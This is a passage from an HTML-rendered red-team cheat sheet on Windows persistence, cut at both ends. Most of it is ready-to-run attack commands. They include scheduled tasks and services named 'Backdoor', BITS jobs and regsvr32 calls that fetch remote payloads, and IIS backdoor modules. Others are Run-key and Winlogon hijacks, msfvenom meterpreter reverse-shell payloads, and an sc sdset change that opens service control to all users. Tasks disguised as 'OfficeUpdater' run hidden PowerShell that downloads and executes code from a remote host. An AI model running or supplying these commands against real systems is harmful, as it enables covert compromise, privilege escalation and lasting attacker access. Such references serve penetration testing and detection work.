<a id="__codelineno-14-5" name="__codelineno-14-5" href="#__codelineno-14-5"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nv">$D</span> <span class="p">=</span> <span class="nb">New-ScheduledTask</span> <span class="n">-Action</span> <span class="nv">$A</span> <span class="n">-Trigger</span> <span class="nv">$T</span> <span class="n">-Principal</span> <span class="nv">$P</span> <span class="n">-Settings</span> <span class="nv">$S</span>
<a id="__codelineno-14-6" name="__codelineno-14-6" href="#__codelineno-14-6"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">Register-ScheduledTask</span> <span class="n">Backdoor</span> <span class="n">-InputObject</span> <span class="nv">$D</span>
</code></pre></div></p>
</li>
<li>
<p>Using SharPersist
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="c"># Add to a current scheduled task</span>
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">schtaskbackdoor</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Something Cool&quot;</span> <span class="n">-m</span> <span class="n">add</span>
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a>
<a id="__codelineno-15-4" name="__codelineno-15-4" href="#__codelineno-15-4"></a><span class="c"># Add new task</span>
<a id="__codelineno-15-5" name="__codelineno-15-5" href="#__codelineno-15-5"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">schtask</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Some Task&quot;</span> <span class="n">-m</span> <span class="n">add</span>
<a id="__codelineno-15-6" name="__codelineno-15-6" href="#__codelineno-15-6"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">schtask</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Some Task&quot;</span> <span class="n">-m</span> <span class="n">add</span> <span class="n">-o</span> <span class="n">hourly</span>
</code></pre></div></p>
</li>
</ul>
<h3 id="bits-jobs">BITS Jobs</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">create</span> <span class="n">backdoor</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">addfile</span> <span class="n">backdoor</span> <span class="s2">&quot;http://10.10.10.10/evil.exe&quot;</span> <span class="s2">&quot;C:\tmp\evil.exe&quot;</span>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a>
<a id="__codelineno-16-4" name="__codelineno-16-4" href="#__codelineno-16-4"></a><span class="c"># v1</span>
<a id="__codelineno-16-5" name="__codelineno-16-5" href="#__codelineno-16-5"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">SetNotifyCmdLine</span> <span class="n">backdoor</span> <span class="n">C</span><span class="p">:\</span><span class="n">tmp</span><span class="p">\</span><span class="n">evil</span><span class="p">.</span><span class="n">exe</span> <span class="n">NUL</span>
<a id="__codelineno-16-6" name="__codelineno-16-6" href="#__codelineno-16-6"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">SetMinRetryDelay</span> <span class="s2">&quot;backdoor&quot;</span> <span class="n">60</span>
<a id="__codelineno-16-7" name="__codelineno-16-7" href="#__codelineno-16-7"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">resume</span> <span class="n">backdoor</span>
<a id="__codelineno-16-8" name="__codelineno-16-8" href="#__codelineno-16-8"></a>
<a id="__codelineno-16-9" name="__codelineno-16-9" href="#__codelineno-16-9"></a><span class="c"># v2 - exploit/multi/script/web_delivery</span>
<a id="__codelineno-16-10" name="__codelineno-16-10" href="#__codelineno-16-10"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">SetNotifyCmdLine</span> <span class="n">backdoor</span> <span class="n">regsvr32</span><span class="p">.</span><span class="n">exe</span> <span class="s2">&quot;/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll&quot;</span>
<a id="__codelineno-16-11" name="__codelineno-16-11" href="#__codelineno-16-11"></a><span class="n">bitsadmin</span> <span class="p">/</span><span class="n">resume</span> <span class="n">backdoor</span>
</code></pre></div>
<h2 id="serviceland">Serviceland</h2>
<h3 id="iis">IIS</h3>
<p>IIS Raid Backdooring IIS Using Native Modules</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="p">$</span> <span class="n">git</span> <span class="n">clone</span> <span class="n">https</span><span class="p">://</span><span class="n">github</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">0x09AL</span><span class="p">/</span><span class="n">IIS-Raid</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="p">$</span> <span class="n">python</span> <span class="n">iis_controller</span><span class="p">.</span><span class="n">py</span> <span class="p">-</span><span class="n">-url</span> <span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">11</span><span class="p">/</span> <span class="p">-</span><span class="n">-password</span> <span class="n">SIMPLEPASS</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="n">C</span><span class="p">:\</span><span class="n">Windows</span><span class="p">\</span><span class="n">system32</span><span class="p">\</span><span class="n">inetsrv</span><span class="p">\</span><span class="n">APPCMD</span><span class="p">.</span><span class="n">EXE</span> <span class="n">install</span> <span class="n">module</span> <span class="p">/</span><span class="n">name</span><span class="p">:</span><span class="n">Module</span> <span class="n">Name</span> <span class="p">/</span><span class="n">image</span><span class="p">:</span><span class="s2">&quot;%windir%\System32\inetsrv\IIS-Backdoor.dll&quot;</span> <span class="p">/</span><span class="n">add</span><span class="p">:</span><span class="n">true</span>
</code></pre></div>
<h3 id="windows-service">Windows Service</h3>
<p>Using SharPersist</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">service</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Some Service&quot;</span> <span class="n">-m</span> <span class="n">add</span>
</code></pre></div>
<h2 id="elevated">Elevated</h2>
<h3 id="registry-hklm">Registry HKLM</h3>
<p>Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="n">Value</span> <span class="n">name</span><span class="p">:</span> <span class="n">Backdoor</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="n">Value</span> <span class="n">data</span><span class="p">:</span> <span class="n">C</span><span class="p">:\</span><span class="n">Windows</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="n">backdoor</span><span class="p">.</span><span class="n">exe</span>
</code></pre></div>
<p>Using the command line </p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\tmp\backdoor.exe&quot;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\tmp\backdoor.exe&quot;</span>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\tmp\backdoor.exe&quot;</span>
<a id="__codelineno-20-4" name="__codelineno-20-4" href="#__codelineno-20-4"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\tmp\backdoor.exe&quot;</span>
</code></pre></div>
<h4 id="winlogon-helper-dll">Winlogon Helper DLL</h4>
<blockquote>
<p>Run executable during Windows logon</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="n">msfvenom</span> <span class="n">-p</span> <span class="n">windows</span><span class="p">/</span><span class="n">meterpreter</span><span class="p">/</span><span class="n">reverse_tcp</span> <span class="n">LHOST</span><span class="p">=</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span> <span class="n">LPORT</span><span class="p">=</span><span class="n">4444</span> <span class="o">-f</span> <span class="n">exe</span> <span class="p">&gt;</span> <span class="n">evilbinary</span><span class="p">.</span><span class="n">exe</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="n">msfvenom</span> <span class="n">-p</span> <span class="n">windows</span><span class="p">/</span><span class="n">meterpreter</span><span class="p">/</span><span class="n">reverse_tcp</span> <span class="n">LHOST</span><span class="p">=</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span> <span class="n">LPORT</span><span class="p">=</span><span class="n">4444</span> <span class="o">-f</span> <span class="n">dll</span> <span class="p">&gt;</span> <span class="n">evilbinary</span><span class="p">.</span><span class="n">dll</span>
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a>
<a id="__codelineno-21-4" name="__codelineno-21-4" href="#__codelineno-21-4"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Userinit</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;Userinit.exe, evilbinary.exe&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-21-5" name="__codelineno-21-5" href="#__codelineno-21-5"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Shell</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;explorer.exe, evilbinary.exe&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-21-6" name="__codelineno-21-6" href="#__codelineno-21-6"></a><span class="nb">Set-ItemProperty</span> <span class="s2">&quot;HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&quot;</span> <span class="s2">&quot;Userinit&quot;</span> <span class="s2">&quot;Userinit.exe, evilbinary.exe&quot;</span> <span class="n">-Force</span>
<a id="__codelineno-21-7" name="__codelineno-21-7" href="#__codelineno-21-7"></a><span class="nb">Set-ItemProperty</span> <span class="s2">&quot;HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&quot;</span> <span class="s2">&quot;Shell&quot;</span> <span class="s2">&quot;explorer.exe, evilbinary.exe&quot;</span> <span class="n">-Force</span>
</code></pre></div>
<h4 id="globalflag">GlobalFlag</h4>
<blockquote>
<p>Run executable after notepad is killed</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">GlobalFlag</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="n">512</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">ReportingMode</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="n">1</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">MonitorProcess</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\temp\evil.exe&quot;</span>
</code></pre></div>
<h3 id="startup-elevated">Startup Elevated</h3>
<p>Create a batch script in the user startup folder.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="n">C</span><span class="p">:\</span><span class="n">ProgramData</span><span class="p">\</span><span class="n">Microsoft</span><span class="p">\</span><span class="n">Windows</span><span class="p">\</span><span class="nb">Start </span><span class="n">Menu</span><span class="p">\</span><span class="n">Programs</span><span class="p">\</span><span class="n">StartUp</span>
</code></pre></div>
<h3 id="services-elevated">Services Elevated</h3>
<p>Create a service that will start automatically or on-demand.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="c"># Powershell</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="nb">New-Service</span> <span class="n">-Name</span> <span class="s2">&quot;Backdoor&quot;</span> <span class="n">-BinaryPathName</span> <span class="s2">&quot;C:\Windows\Temp\backdoor.exe&quot;</span> <span class="n">-Description</span> <span class="s2">&quot;Nothing to see here.&quot;</span> <span class="n">-StartupType</span> <span class="n">Automatic</span>
<a id="__codelineno-24-3" name="__codelineno-24-3" href="#__codelineno-24-3"></a><span class="nb">sc start </span><span class="n">Backdoor</span>
<a id="__codelineno-24-4" name="__codelineno-24-4" href="#__codelineno-24-4"></a>
<a id="__codelineno-24-5" name="__codelineno-24-5" href="#__codelineno-24-5"></a><span class="c"># SharPersist</span>
<a id="__codelineno-24-6" name="__codelineno-24-6" href="#__codelineno-24-6"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">service</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c backdoor.exe&quot;</span> <span class="n">-n</span> <span class="s2">&quot;Backdoor&quot;</span> <span class="n">-m</span> <span class="n">add</span>
<a id="__codelineno-24-7" name="__codelineno-24-7" href="#__codelineno-24-7"></a>
<a id="__codelineno-24-8" name="__codelineno-24-8" href="#__codelineno-24-8"></a><span class="c"># sc</span>
<a id="__codelineno-24-9" name="__codelineno-24-9" href="#__codelineno-24-9"></a><span class="nb">sc </span><span class="n">create</span> <span class="n">Backdoor</span> <span class="n">binpath</span><span class="p">=</span> <span class="s2">&quot;cmd.exe /k C:\temp\backdoor.exe&quot;</span> <span class="n">start</span><span class="p">=</span><span class="s2">&quot;auto&quot;</span> <span class="n">obj</span><span class="p">=</span><span class="s2">&quot;LocalSystem&quot;</span>
<a id="__codelineno-24-10" name="__codelineno-24-10" href="#__codelineno-24-10"></a><span class="nb">sc start </span><span class="n">Backdoor</span>
</code></pre></div>
<h3 id="servicesecuritydescriptor">ServiceSecurityDescriptor</h3>
<p>Allow any arbitrary non-administrative user to have full SYSTEM permissions on a machine persistently by feeding an overly permissive ACL to the service control manager with sdset.</p>
<p><strong>Exploit</strong>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="n">sc</span><span class="p">.</span><span class="n">exe</span> <span class="n">sdset</span> <span class="p">&lt;</span><span class="n">ServiceName</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="n">ServiceSecurityDescriptor</span><span class="p">&gt;</span>
</code></pre></div>
<p>The following command grants full control (<code>Key Access</code>) over the Service Control Manager to all users (represented by <code>WD</code>, which stands for "World"). In other words, it allows any user to start, stop, modify, or control services through the Service Control Manager, which can be a security risk as it opens service management to everyone on the system.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="n">sc</span><span class="p">.</span><span class="n">exe</span> <span class="n">sdset</span> <span class="n">scmanager</span> <span class="n">D</span><span class="p">:(</span><span class="n">A</span><span class="p">;;</span><span class="n">KA</span><span class="p">;;;</span><span class="n">WD</span><span class="p">)</span>
</code></pre></div>
<ul>
<li><code>sc.exe</code>: The Service Control (sc) command is a Windows utility used for managing services.</li>
<li><code>sdset</code>: This option sets a Security Descriptor (SD) for a service or the Service Control Manager itself. A security descriptor defines permissions and access rights to system resources.</li>
<li><code>scmanager</code>: This is the target, referring to the Service Control Manager, which manages the services in the system.</li>
</ul>
<p>The <code>ServiceSecurityDescriptor</code> is defined using the Service Descriptor Definition Language (SDDL).</p>
<p>List the permissions for <code>scmanager</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="n">sc</span><span class="p">.</span><span class="n">exe</span> <span class="n">sdshow</span> <span class="n">scmanager</span>
</code></pre></div>
<p>Alternatively, you can use <a href="https://github.com/zacateras/sddl-parser">zacateras/sddl-parser</a> to understand the Security Descriptor Definition Language (SDDL), e.g: <code>./Sddl.Parser.Console.exe "O:BAG:BAD:(A;CI;CCDCRP;;;NS)"</code>.</p>
<p>Abuse the weaken configuration to create a service that grants administrator privilege to a custom user <code>user_basic</code>.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="nb">sc </span><span class="n">create</span> <span class="n">LPE</span> <span class="n">displayName</span><span class="p">=</span> <span class="s2">&quot;LPE&quot;</span> <span class="n">binPath</span><span class="p">=</span> <span class="s2">&quot;C:\Windows\System32\net.exe localgroup Administrators user_basic /add&quot;</span> <span class="n">start</span><span class="p">=</span> <span class="n">auto</span>
</code></pre></div>
<p>Then you need to wait for a reboot for the service to automatically start and grant the user with elevated privilege or any persistence mechanism you specified in the <code>binPath</code>.</p>
<h3 id="scheduled-tasks-elevated">Scheduled Tasks Elevated</h3>
<p>Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day.</p>
<blockquote>
<p>Processes spawned as scheduled tasks have taskeng.exe process as their parent</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="c"># Powershell</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a><span class="nv">$A</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskAction</span> <span class="n">-Execute</span> <span class="s2">&quot;cmd.exe&quot;</span> <span class="n">-Argument</span> <span class="s2">&quot;/c C:\temp\backdoor.exe&quot;</span>
<a id="__codelineno-29-3" name="__codelineno-29-3" href="#__codelineno-29-3"></a><span class="nv">$T</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskTrigger</span> <span class="n">-Daily</span> <span class="n">-At</span> <span class="n">9am</span>
<a id="__codelineno-29-4" name="__codelineno-29-4" href="#__codelineno-29-4"></a><span class="c"># OR</span>
<a id="__codelineno-29-5" name="__codelineno-29-5" href="#__codelineno-29-5"></a><span class="nv">$T</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskTrigger</span> <span class="n">-Daily</span> <span class="n">-At</span> <span class="s2">&quot;9/30/2020 11:05:00 AM&quot;</span>
<a id="__codelineno-29-6" name="__codelineno-29-6" href="#__codelineno-29-6"></a><span class="nv">$P</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskPrincipal</span> <span class="s2">&quot;NT AUTHORITY\SYSTEM&quot;</span> <span class="n">-RunLevel</span> <span class="n">Highest</span>
<a id="__codelineno-29-7" name="__codelineno-29-7" href="#__codelineno-29-7"></a><span class="nv">$S</span> <span class="p">=</span> <span class="nb">New-ScheduledTaskSettingsSet</span>
<a id="__codelineno-29-8" name="__codelineno-29-8" href="#__codelineno-29-8"></a><span class="nv">$D</span> <span class="p">=</span> <span class="nb">New-ScheduledTask</span> <span class="n">-Action</span> <span class="nv">$A</span> <span class="n">-Trigger</span> <span class="nv">$T</span> <span class="n">-Principal</span> <span class="nv">$P</span> <span class="n">-Settings</span> <span class="nv">$S</span>
<a id="__codelineno-29-9" name="__codelineno-29-9" href="#__codelineno-29-9"></a><span class="nb">Register-ScheduledTask</span> <span class="s2">&quot;Backdoor&quot;</span> <span class="n">-InputObject</span> <span class="nv">$D</span>
<a id="__codelineno-29-10" name="__codelineno-29-10" href="#__codelineno-29-10"></a>
<a id="__codelineno-29-11" name="__codelineno-29-11" href="#__codelineno-29-11"></a><span class="c"># Native schtasks</span>
<a id="__codelineno-29-12" name="__codelineno-29-12" href="#__codelineno-29-12"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="nb">sc </span><span class="n">minute</span> <span class="p">/</span><span class="n">mo</span> <span class="n">1</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;eviltask&quot;</span> <span class="p">/</span><span class="n">tr</span> <span class="n">C</span><span class="p">:\</span><span class="n">tools</span><span class="p">\</span><span class="n">shell</span><span class="p">.</span><span class="n">cmd</span> <span class="p">/</span><span class="n">ru</span> <span class="s2">&quot;SYSTEM&quot;</span>
<a id="__codelineno-29-13" name="__codelineno-29-13" href="#__codelineno-29-13"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="nb">sc </span><span class="n">minute</span> <span class="p">/</span><span class="n">mo</span> <span class="n">1</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;eviltask&quot;</span> <span class="p">/</span><span class="n">tr</span> <span class="n">calc</span> <span class="p">/</span><span class="n">ru</span> <span class="s2">&quot;SYSTEM&quot;</span> <span class="p">/</span><span class="n">s</span> <span class="n">dc-mantvydas</span> <span class="p">/</span><span class="n">u</span> <span class="n">user</span> <span class="p">/</span><span class="n">p</span> <span class="n">password</span>
<a id="__codelineno-29-14" name="__codelineno-29-14" href="#__codelineno-29-14"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">Create</span> <span class="p">/</span><span class="n">RU</span> <span class="s2">&quot;NT AUTHORITY\SYSTEM&quot;</span> <span class="p">/</span><span class="n">tn</span> <span class="no">[TaskName]</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;regsvr32.exe -s \&quot;</span><span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\*\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Local</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="no">[payload]</span><span class="p">.</span><span class="n">dll</span><span class="p">\</span><span class="s2">&quot;&quot;</span> <span class="p">/</span><span class="nb">SC </span><span class="n">ONCE</span> <span class="p">/</span><span class="n">Z</span> <span class="p">/</span><span class="n">ST</span> <span class="no">[Time]</span> <span class="p">/</span><span class="n">ET</span> <span class="no">[Time]</span>
<a id="__codelineno-29-15" name="__codelineno-29-15" href="#__codelineno-29-15"></a>
<a id="__codelineno-29-16" name="__codelineno-29-16" href="#__codelineno-29-16"></a><span class="c">##(X86) - On User Login</span>
<a id="__codelineno-29-17" name="__codelineno-29-17" href="#__codelineno-29-17"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterA</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onlogon</span> <span class="p">/</span><span class="n">ru</span> <span class="n">System</span>
<a id="__codelineno-29-18" name="__codelineno-29-18" href="#__codelineno-29-18"></a>
<a id="__codelineno-29-19" name="__codelineno-29-19" href="#__codelineno-29-19"></a><span class="c">##(X86) - On System Start</span>
<a id="__codelineno-29-20" name="__codelineno-29-20" href="#__codelineno-29-20"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterB</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onstart</span> <span class="p">/</span><span class="n">ru</span> <span class="n">System</span>
<a id="__codelineno-29-21" name="__codelineno-29-21" href="#__codelineno-29-21"></a>
<a id="__codelineno-29-22" name="__codelineno-29-22" href="#__codelineno-29-22"></a><span class="c">##(X86) - On User Idle (30mins)</span>
<a id="__codelineno-29-23" name="__codelineno-29-23" href="#__codelineno-29-23"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterC</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onidle</span> <span class="p">/</span><span class="n">i</span> <span class="n">30</span>
<a id="__codelineno-29-24" name="__codelineno-29-24" href="#__codelineno-29-24"></a>
<a id="__codelineno-29-25" name="__codelineno-29-25" href="#__codelineno-29-25"></a><span class="c">##(X64) - On User Login</span>
<a id="__codelineno-29-26" name="__codelineno-29-26" href="#__codelineno-29-26"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterA</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onlogon</span> <span class="p">/</span><span class="n">ru</span> <span class="n">System</span>
<a id="__codelineno-29-27" name="__codelineno-29-27" href="#__codelineno-29-27"></a>
<a id="__codelineno-29-28" name="__codelineno-29-28" href="#__codelineno-29-28"></a><span class="c">##(X64) - On System Start</span>
<a id="__codelineno-29-29" name="__codelineno-29-29" href="#__codelineno-29-29"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterB</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onstart</span> <span class="p">/</span><span class="n">ru</span> <span class="n">System</span>
<a id="__codelineno-29-30" name="__codelineno-29-30" href="#__codelineno-29-30"></a>
<a id="__codelineno-29-31" name="__codelineno-29-31" href="#__codelineno-29-31"></a><span class="c">##(X64) - On User Idle (30mins)</span>
